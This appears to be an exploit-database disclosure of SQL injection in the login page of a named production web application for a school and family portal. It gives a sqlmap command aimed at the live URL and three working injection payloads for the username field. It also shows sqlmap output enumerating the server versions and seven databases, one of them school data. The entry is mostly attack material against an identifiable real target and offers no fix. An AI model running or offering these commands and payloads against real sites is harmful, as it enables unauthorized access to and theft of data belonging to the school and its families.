Athens School / Atenas Familia / Atenas Tech / Bitnami LAMP | SQL Injection Vulnerability

2021.09.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Athens School / Atenas Familia / Atenas Tech / Bitnami LAMP | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "http://prod.atenas.tech/familia/login.php" --form --dbs --batch
---------------------------------------------------------------------------------------------------

.tech is the internet's new generic top-level domain for IT professionals, web developers, software engineers, project managers, and UX designers.

Athens School
Atenas Familia
Atenas Tech
Bitnami LAMP

http://prod.atenas.tech/familia/login.php

---
Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: username=ykfU' RLIKE (SELECT (CASE WHEN (4900=4900) THEN 0x796b6655 ELSE 0x28 END)) AND 'taTA'='taTA&password=&saveidentity=on

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: username=ykfU' AND GTID_SUBSET(CONCAT(0x716b6b7a71,(SELECT (ELT(3198=3198,1))),0x716a7a6b71),3198) AND 'AbeW'='AbeW&password=&saveidentity=on

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=ykfU' AND (SELECT 9806 FROM (SELECT(SLEEP(5)))jyyH) AND 'sqlu'='sqlu&password=&saveidentity=on
---

the back-end DBMS is MySQL
web application technology: Apache 2.4.46, PHP 7.4.14
the back-end DBMS: MySQL >= 5.6
banner: '8.0.18-google'

available databases [7]:
[+] atenas_colegio
[+] demo
[+] information_schema
[+] mysql
[+] performance_schema
[+] stage
[+] sys



Copyright 2021, cxsecurity.com

 
